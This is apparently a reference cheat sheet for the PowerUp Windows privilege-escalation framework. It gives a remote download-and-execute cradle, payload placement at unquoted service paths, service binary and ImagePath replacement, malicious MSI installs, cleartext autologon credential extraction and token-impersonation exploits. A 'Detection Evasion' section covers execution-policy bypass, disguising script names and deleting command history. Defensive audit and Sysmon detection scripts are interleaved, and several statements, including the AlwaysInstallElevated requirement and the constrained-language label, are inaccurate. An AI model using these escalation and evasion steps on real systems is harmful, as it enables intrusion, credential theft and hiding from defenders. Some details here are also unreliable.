Powerup

PowerUp is a PowerShell framework for comprehensive Windows privilege escalation vector discovery and exploitation.

Installation

# Download and load into memory
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Privesc/PowerUp.ps1')

# Or download and dot-source (wget is an alias for Invoke-WebRequest; -O is ambiguous, -OutFile is the parameter)
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Privesc/PowerUp.ps1 -OutFile PowerUp.ps1
. .\PowerUp.ps1

Basic Usage

Command                             Description
Invoke-AllChecks                    Run all privilege escalation checks
Get-UnquotedService                 Find unquoted service paths
Get-ModifiableService               Find writable service executables
Get-RegistryAlwaysInstallElevated   Check AlwaysInstallElevated policy
Get-RegistryAutoLogon               Retrieve autologon credentials
Invoke-BypassUAC                    Bypass User Account Control
Invoke-ServiceAbuse                 Exploit service misconfigurations

Detailed Function Reference

Invoke-AllChecks

# Run comprehensive privilege escalation assessment
Invoke-AllChecks

# Output includes:
# - Unquoted service paths
# - Modifiable service binaries
# - Weak registry permissions
# - Always install elevated checks
# - Autologon credentials
# - Service abuse opportunities

Get-UnquotedService

# Find services with unquoted paths containing spaces
Get-UnquotedService

# Example vulnerable output:
# ServiceName    : VulnerableService
# Path           : C:\Program Files\Vulnerable Program\service.exe
# ModifiablePath : C:\Program.exe
# Exploitable    : True

Get-ModifiableService

# Find service binaries that current user can modify
Get-ModifiableService

# Allows DLL injection or binary replacement
# Check if binary path is in a writable directory

Get-ModifiableServiceFile

# Check specific service file permissions
Get-ModifiableServiceFile -ServiceName "ServiceName"

# Returns TRUE if user has write/modify permissions

Get-RegistryAlwaysInstallElevated

# Check if MSI packages install with elevated privileges
Get-RegistryAlwaysInstallElevated

# If True + current user is in local admin group:
# Can craft malicious MSI and install as SYSTEM

Get-RegistryAutoLogon

# Extract saved autologon credentials
Get-RegistryAutoLogon

# Returns:
# - Username
# - Domain
# - Password (cleartext in registry)

Get-ModifiableRegistryPath

# Find writable registry paths
Get-ModifiableRegistryPath

# Useful for:
# - Persistence mechanisms
# - Modifying service configurations
# - Changing Run registry entries

Get-RegistryMountedDrive

# Check for mounted network drives with credentials
Get-RegistryMountedDrive

# Credentials stored for future mounting

Get-DomainGroupMember

# List members of domain groups
Get-DomainGroupMember -GroupName "Administrators"

# Identify privileged users for targeting

Unquoted Service Path Exploitation

Identifying the Vulnerability

Get-UnquotedService | Where-Object {$_.Exploitable -eq $true}

# Output:
# ServiceName: VulnService
# Path: C:\Program Files\Vulnerable App\service.exe
# Exploitable: True
# CanRestart: True

Exploitation Steps

# 1. Check if directory is writable
Test-Path "C:\Program Files\Vulnerable App" -PathType Container
Get-Acl "C:\Program Files\Vulnerable App"

# 2. Create payload (must maintain service interface)
# In this case, payload would be "C:\Program.exe"
# Service tries to run: C:\Program Files\Vulnerable App\service.exe
# But finds C:\Program.exe first in search order

# 3. Place payload at priority path
Copy-Item "malicious.exe" "C:\Program.exe"

# 4. Restart service (may require admin or wait for scheduled restart)
Restart-Service "VulnService" -Force

# 5. Verify execution (malicious.exe runs as SYSTEM)
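
The search-order behaviour in steps 2 and 3 is what makes the finding exploitable, so the same logic is what a defender audits. The block below is an added example, not PowerUp code: it enumerates services with the built-in CIM class, computes the intermediate "C:\Program.exe"-style paths Windows would probe, reports whether the current user could create a file in any of those directories, and with -Fix rewrites ImagePath with quotes. Function and parameter names are this example's own; the registry key and Win32_Service are standard Windows.

```powershell
# Added example, not part of PowerUp: audit unquoted service paths and optionally remediate them.
function Test-WritableByCurrentUser {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User) + @($id.Groups)            # SIDs the current token carries
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }   # Deny ACEs not evaluated (simplification)
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) } catch { continue }
        # bit 2 = CreateFiles/WriteData: enough to drop a new file into the directory
        if (($sids -contains $sid) -and (([int]$ace.FileSystemRights -band 2) -ne 0)) { return $true }
    }
    return $false
}

function Get-UnquotedServicePathAudit {
    [CmdletBinding()]
    param([switch]$Fix)   # -Fix rewrites ImagePath with quotes (needs admin rights)
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $raw = $svc.PathName
        if (-not $raw -or $raw.StartsWith('"')) { continue }      # empty or already quoted
        if ($raw -notmatch '^(?<exe>.*?\.exe)') { continue }        # executable ends at the first ".exe"
        $exe = $Matches.exe
        if ($exe -notmatch ' ') { continue }                        # no space in the path: unambiguous
        $parts = $exe.Split(' ')
        # CreateProcess tries every space-delimited prefix with ".exe" appended before the real path,
        # e.g. C:\Program.exe then C:\Program Files\Vulnerable.exe
        $probes   = 1..($parts.Count - 1) | ForEach-Object { ($parts[0..($_ - 1)] -join ' ') + '.exe' }
        $writable = @($probes | Where-Object { Test-WritableByCurrentUser (Split-Path -Path $_ -Parent) })
        [pscustomobject]@{
            ServiceName    = $svc.Name
            PathName       = $raw
            ProbePaths     = $probes
            WritableProbes = $writable   # non-empty: current user could plant a binary there
            RunsAs         = $svc.StartName
        }
        if ($Fix) {
            $key  = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
            $kind = (Get-Item -Path $key).GetValueKind('ImagePath')   # preserve REG_SZ vs REG_EXPAND_SZ
            $tail = $raw.Substring($exe.Length)                        # arguments after the executable
            Set-ItemProperty -Path $key -Name ImagePath -Type $kind -Value ('"{0}"{1}' -f $exe, $tail)
        }
    }
}

Get-UnquotedServicePathAudit | Format-List
```

Inherit-only ACEs that carry generic rights (large numeric FileSystemRights values) are not expanded by this check, so treat an empty WritableProbes list as "not obviously writable" rather than proof of safety.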

Always Install Elevated Exploitation

# Check if vulnerable
Get-RegistryAlwaysInstallElevated

# If returns True:
# 1. Create malicious MSI package
# 2. Install silently:
msiexec /i payload.msi /qb /log output.txt

# Executes with SYSTEM privileges regardless of user

Autologon Credential Extraction

Get-RegistryAutoLogon

# Returns cleartext credentials stored in:
# HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
# - DefaultUsername
# - DefaultPassword
# - DefaultDomainName

# Can use credentials for lateral movement or further escalation
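
The two registry findings above (AlwaysInstallElevated and Winlogon autologon) can be audited and remediated with the native registry provider. This is an added example, not PowerUp code; the key paths are the standard policy and Winlogon locations, the function name is this example's own, and -Fix needs admin rights. One caveat the page does not state: AlwaysInstallElevated is only effective when both the HKLM and the HKCU value are 1.

```powershell
# Added example, not part of PowerUp: audit AlwaysInstallElevated and autologon, optionally remediate.
function Get-InstallerAutoLogonAudit {
    [CmdletBinding()]
    param([switch]$Fix)
    $installer = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $winlogon  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

    # AlwaysInstallElevated is only effective when BOTH the machine and the user value are 1;
    # a single hive set to 1 is a latent misconfiguration but does not grant SYSTEM installs by itself.
    $aie = foreach ($hive in 'HKLM', 'HKCU') {
        $v = Get-ItemProperty -Path "${hive}:\$installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        [pscustomobject]@{ Hive = $hive; Value = [int]$v.AlwaysInstallElevated }   # missing value counts as 0
    }
    $aieEffective = @($aie | Where-Object Value -eq 1).Count -eq 2

    # Autologon: DefaultPassword in the registry is readable by every local user. When AutoAdminLogon is 1
    # but DefaultPassword is absent, the password usually sits in the LSA secret of the same name instead.
    $wl        = Get-ItemProperty -Path $winlogon
    $autoLogon = $wl.AutoAdminLogon -eq '1'
    $plainPw   = -not [string]::IsNullOrEmpty($wl.DefaultPassword)

    if ($Fix) {
        foreach ($hive in 'HKLM', 'HKCU') {
            $p = "${hive}:\$installer"
            if (Test-Path $p) { Set-ItemProperty -Path $p -Name AlwaysInstallElevated -Value 0 -Type DWord }
        }
        if ($autoLogon -or $plainPw) {
            Set-ItemProperty -Path $winlogon -Name AutoAdminLogon -Value '0'
            Remove-ItemProperty -Path $winlogon -Name DefaultPassword -ErrorAction SilentlyContinue
        }
    }
    [pscustomobject]@{
        AlwaysInstallElevated_HKLM     = $aie[0].Value
        AlwaysInstallElevated_HKCU     = $aie[1].Value
        AlwaysInstallElevatedEffective = $aieEffective
        AutoAdminLogon                 = $autoLogon
        DefaultUserName                = $wl.DefaultUserName
        DefaultDomainName              = $wl.DefaultDomainName
        PasswordInRegistry             = $plainPw   # cleartext DefaultPassword present
    }
}

Get-InstallerAutoLogonAudit
```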

Service Abuse Patterns

Service Binary Replacement

# If service binary is modifiable:
# 1. Backup original
Copy-Item "C:\Path\Service.exe" "C:\Path\Service.exe.bak"

# 2. Replace with payload
Copy-Item "payload.exe" "C:\Path\Service.exe"

# 3. Restart service
Restart-Service "ServiceName" -Force

Service Registry Modification

# If service registry path is writable:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\ServiceName" /v ImagePath /t REG_SZ /d "C:\payload.exe" /f

# Next service restart executes payload as SYSTEM

Service Permissions Abuse

# If current user can start/stop service:
# 1. Identify service executable path
# 2. Check if path is writable
# 3. Replace executable or inject DLL
# 4. Start service with new payload
Start-Service "ServiceName"
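
The registry modification pattern above (a direct write to a service's ImagePath) leaves a clear trace when Sysmon registry auditing is enabled: Event ID 13 (registry value set) records the writing process, the value path and the new data. The block below is an added detection example, not PowerUp code or a Sysmon default: it converts Sysmon records into plain objects and flags ImagePath writes by any process outside an assumed allow-list; the sample events, the CORP\lowpriv user and the VulnService name are constructed for the offline run.

```powershell
# Added example, not part of PowerUp: detect service ImagePath rewrites from Sysmon Event ID 13 records.
function ConvertFrom-SysmonEvent {
    param([Parameter(ValueFromPipeline)] $Event)   # EventLogRecord from Get-WinEvent
    process {
        $x = [xml]$Event.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{ EventId = $Event.Id; Image = $d.Image; User = $d.User
                           TargetObject = $d.TargetObject; Details = $d.Details }
    }
}

function Find-ServiceImagePathTamper {
    param(
        [Parameter(ValueFromPipeline)] $Record,
        # Processes expected to rewrite ImagePath (assumed baseline, tune per estate). Note that
        # "sc.exe config binPath=" is applied by services.exe and is therefore NOT caught by this rule;
        # pair it with Sysmon Event ID 1 process-creation monitoring for sc.exe command lines.
        [string[]]$AllowedImages = @('C:\Windows\System32\services.exe', 'C:\Windows\System32\msiexec.exe')
    )
    process {
        if ($Record.EventId -ne 13) { return }
        if ($Record.TargetObject -notmatch '(?i)\\Services\\[^\\]+\\ImagePath$') { return }
        if ($AllowedImages -contains $Record.Image) { return }   # string -contains is case-insensitive
        [pscustomobject]@{
            Service      = ($Record.TargetObject -split '\\')[-2]
            NewImagePath = $Record.Details
            Writer       = $Record.Image
            User         = $Record.User
        }
    }
}

# Constructed sample records (offline run); the middle one mirrors the "reg add ... ImagePath" pattern above
$sample = @(
    [pscustomobject]@{ EventId = 13; Image = 'C:\Windows\System32\services.exe'; User = 'NT AUTHORITY\SYSTEM'
        TargetObject = 'HKLM\System\CurrentControlSet\Services\Spooler\ImagePath'; Details = 'C:\Windows\System32\spoolsv.exe' }
    [pscustomobject]@{ EventId = 13; Image = 'C:\Windows\System32\reg.exe'; User = 'CORP\lowpriv'
        TargetObject = 'HKLM\System\CurrentControlSet\Services\VulnService\ImagePath'; Details = 'C:\payload.exe' }
    [pscustomobject]@{ EventId = 1; Image = 'C:\Windows\System32\cmd.exe'; User = 'CORP\lowpriv'; TargetObject = $null; Details = $null }
)
$sample | Find-ServiceImagePathTamper      # flags only VulnService, written by reg.exe
# Live: Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-Sysmon/Operational'; Id=13 } | ConvertFrom-SysmonEvent | Find-ServiceImagePathTamper
```

Sysmon only emits Event ID 13 for value paths matched by its configuration, so the ImagePath pattern must be included in the RegistryEvent rules for this to fire.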

Token Impersonation (Rotten Potato)

# Check for impersonation privileges (the privilege name is SeImpersonatePrivilege; "ImpersonateUser" matches nothing)
whoami /priv | findstr "SeImpersonatePrivilege"

# If SeImpersonatePrivilege present:
# Use Rotten Potato/Golden Potato exploit
# github.com/ohpe/juicy-potato

# JuicyPotato.exe -l 1337 -p C:\payload.exe

Privilege Escalation Chain Example

# 1. Enumerate all opportunities
Invoke-AllChecks

# 2. Identify unquoted service path
$VulnService = Get-UnquotedService | Where-Object {$_.Exploitable}

# 3. Check if directory is writable
$Dir = Split-Path $VulnService.Path
Test-Path $Dir -PathType Container
Get-Acl $Dir | Format-List

# 4. If writable, place payload at exploitable location
Copy-Item "shell.exe" "C:\Program.exe"

# 5. Restart service
Restart-Service $VulnService.ServiceName -Force

# 6. Verify elevation (shell.exe now runs as SYSTEM)

Advanced Usage

Automated Exploitation

# Run all checks and attempt basic exploits
Invoke-PrivEsc

# Attempts:
# - Unquoted service path exploitation
# - AlwaysInstallElevated exploitation
# - Registry modification

Specific Vulnerability Checks

# Check specific vulnerability types
Get-ModifiableService
Get-ModifiableServiceFile
Get-UnattendedInstallFile
Get-WebConfig
Get-ApplicationHost

Credential Harvesting

# Extract various credential sources
Get-RegistryAutoLogon
Get-ApplicationHost
Get-UnattendedInstallFile
Get-WebConfig
Get-CachedRDPTicket

Detection Evasion

# Run in constrained language mode
powershell -ExecutionPolicy Bypass -NoProfile -Command "& {IEX(New-Object Net.WebClient).DownloadString('https://...')}"

# Obfuscate script names
Set-Alias -Name "Check-PrivEsc" -Value "Invoke-AllChecks"

# Clear PowerShell history
Clear-History
Remove-Item (Get-PSReadlineOption).HistorySavePath

Remediation

  • Fix unquoted service paths (add quotes)
  • Apply restrictive service DACLs
  • Disable AlwaysInstallElevated
  • Audit and disable autologon
  • Apply all Windows patches
  • Implement UAC properly
  • Regular privilege audits

Related Tools

  • Seatbelt: .NET-based enumeration
  • winPEAS: General Windows enumeration
  • Rubeus: Kerberos exploitation
  • SharpUp: C# port of PowerUp
  • JuicyPotato: Token impersonation exploit

Last updated: March 2025